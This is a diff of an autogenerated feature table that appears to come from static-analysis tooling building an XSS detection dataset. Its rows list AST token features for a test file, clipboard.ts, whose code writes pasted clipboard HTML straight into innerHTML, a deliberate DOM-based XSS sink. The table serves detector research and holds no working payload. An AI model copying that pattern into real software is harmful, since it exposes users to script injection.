autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:55 | e.origi ... getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:68 | e.origi ... /html') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:68 | e.origi ... /html') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:68 | e.origi ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12528,6 +93810,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:68 | e.origi ... /html') | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:68 | e.origi ... /html') | enclosingFunctionName | bind#functionalargument | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:68 | e.origi ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:68 | exceptional return of e.origi ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:68 | exceptional return of e.origi ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:68 | exceptional return of e.origi ... /html') | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:68 | exceptional return of e.origi ... /html') | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:68 | exceptional return of e.origi ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:21:33:33 | originalEvent | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:21:33:33 | originalEvent | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:21:33:33 | originalEvent | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:21:33:33 | originalEvent | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:21:33:33 | originalEvent | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:35:33:47 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:35:33:47 | clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:35:33:47 | clipboardData | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:35:33:47 | clipboardData | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:35:33:47 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:49:33:55 | getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:49:33:55 | getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:49:33:55 | getData | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:49:33:55 | getData | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:49:33:55 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:57:33:67 | 'text/html' | CalleeFlexibleAccessPath | e.originalEvent.clipboardData.getData | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:57:33:67 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:57:33:67 | 'text/html' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12535,6 +93837,78 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:33:57:33:67 | 'text/html' | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:57:33:67 | 'text/html' | enclosingFunctionName | bind#functionalargument | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:57:33:67 | 'text/html' | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:1:56:2 | (functi ... }\\n}) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:1:56:2 | (functi ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:1:56:2 | (functi ... }\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:1:56:4 | (functi ... }\\n})() | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:1:56:4 | (functi ... }\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:1:56:4 | (functi ... }\\n})() | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:1:56:4 | exceptional return of (functi ... }\\n})() | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:1:56:4 | exceptional return of (functi ... }\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:1:56:4 | exceptional return of (functi ... }\\n})() | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:36:1 | this | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:36:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:36:1 | this | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:36:1 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:36:1 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | 'arguments' object of anonymous function | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | exceptional return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | exceptional return of anonymous function | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | functio ... }\\n} | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | functio ... }\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | functio ... }\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | return of anonymous function | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:36:2:56:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:11 | div | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:11 | div | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:11 | div | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:11 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:11 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:43 | div | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:43 | div | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:43 | div | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:43 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:43 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:43 | div = d ... ("div") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:43 | div = d ... ("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:43 | div = d ... ("div") | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:43 | div = d ... ("div") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:9:37:43 | div = d ... ("div") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:22 | document | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:22 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:22 | document | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:22 | document | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:22 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:36 | documen ... Element | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:36 | documen ... Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:36 | documen ... Element | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:36 | documen ... Element | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:36 | documen ... Element | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:43 | documen ... ("div") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:43 | documen ... ("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:43 | documen ... ("div") | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:43 | documen ... ("div") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:43 | documen ... ("div") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:43 | exceptional return of documen ... ("div") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:43 | exceptional return of documen ... ("div") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:43 | exceptional return of documen ... ("div") | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:43 | exceptional return of documen ... ("div") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:15:37:43 | exceptional return of documen ... ("div") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:24:37:36 | createElement | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:24:37:36 | createElement | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:24:37:36 | createElement | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:24:37:36 | createElement | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:37:24:37:36 | createElement | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:37:38:37:42 | "div" | CalleeFlexibleAccessPath | document.createElement | | autogenerated/Xss/DomBasedXss/clipboard.ts:37:38:37:42 | "div" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:37:38:37:42 | "div" | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12543,6 +93917,157 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:37:38:37:42 | "div" | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:37:38:37:42 | "div" | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:37:38:37:42 | "div" | receiverName | document | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:38:7 | div | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:38:7 | div | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:38:7 | div | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:38:7 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:38:7 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:38:15 | div.onpaste | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:38:15 | div.onpaste | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:38:15 | div.onpaste | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:38:15 | div.onpaste | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:38:15 | div.onpaste | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:55:5 | div.onp ... ;\\n } | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:55:5 | div.onp ... ;\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:55:5 | div.onp ... ;\\n } | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:55:5 | div.onp ... ;\\n } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:5:55:5 | div.onp ... ;\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:9:38:15 | onpaste | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:9:38:15 | onpaste | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:9:38:15 | onpaste | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:9:38:15 | onpaste | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:9:38:15 | onpaste | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:38:18 | this | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:38:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:38:18 | this | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:38:18 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:38:18 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | 'arguments' object of anonymous function | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | exceptional return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | exceptional return of anonymous function | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | functio ... ;\\n } | assignedToPropName | onpaste | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | functio ... ;\\n } | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | functio ... ;\\n } | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | functio ... ;\\n } | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | functio ... ;\\n } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | functio ... ;\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | return of anonymous function | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:19:55:5 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:29:38:29 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:29:38:29 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:29:38:29 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:29:38:29 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:29:38:29 | e | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:29:38:29 | e | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:29:38:29 | e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:29:38:29 | e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:29:38:29 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:38:29:38:29 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:31 | { clipboardData } | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:31 | { clipboardData } | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:31 | { clipboardData } | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:31 | { clipboardData } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:31 | { clipboardData } | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:35 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:35 | clipboardData | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:35 | clipboardData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:35 | clipboardData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:35 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:35 | { clipb ... a } = e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:35 | { clipb ... a } = e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:35 | { clipb ... a } = e | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:35 | { clipb ... a } = e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:15:39:35 | { clipb ... a } = e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:39:17:39:29 | clipboardData | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div 